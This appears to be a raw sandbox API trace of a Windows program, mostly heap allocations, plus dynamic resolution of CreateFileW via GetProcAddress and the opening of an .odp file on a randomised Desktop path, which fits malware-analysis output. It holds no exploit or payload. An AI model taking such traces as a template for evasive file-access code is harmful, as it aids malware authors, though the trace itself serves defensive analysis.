[0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0131.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0131.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0131.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0131.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0131.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0131.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0131.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.777] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.782] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0131.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cada8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.782] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0131.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0131.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0131.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\dcpltjpjl4z2qv.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0131.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.785] FreeLibrary (hLibModule=0x772d0000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0131.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 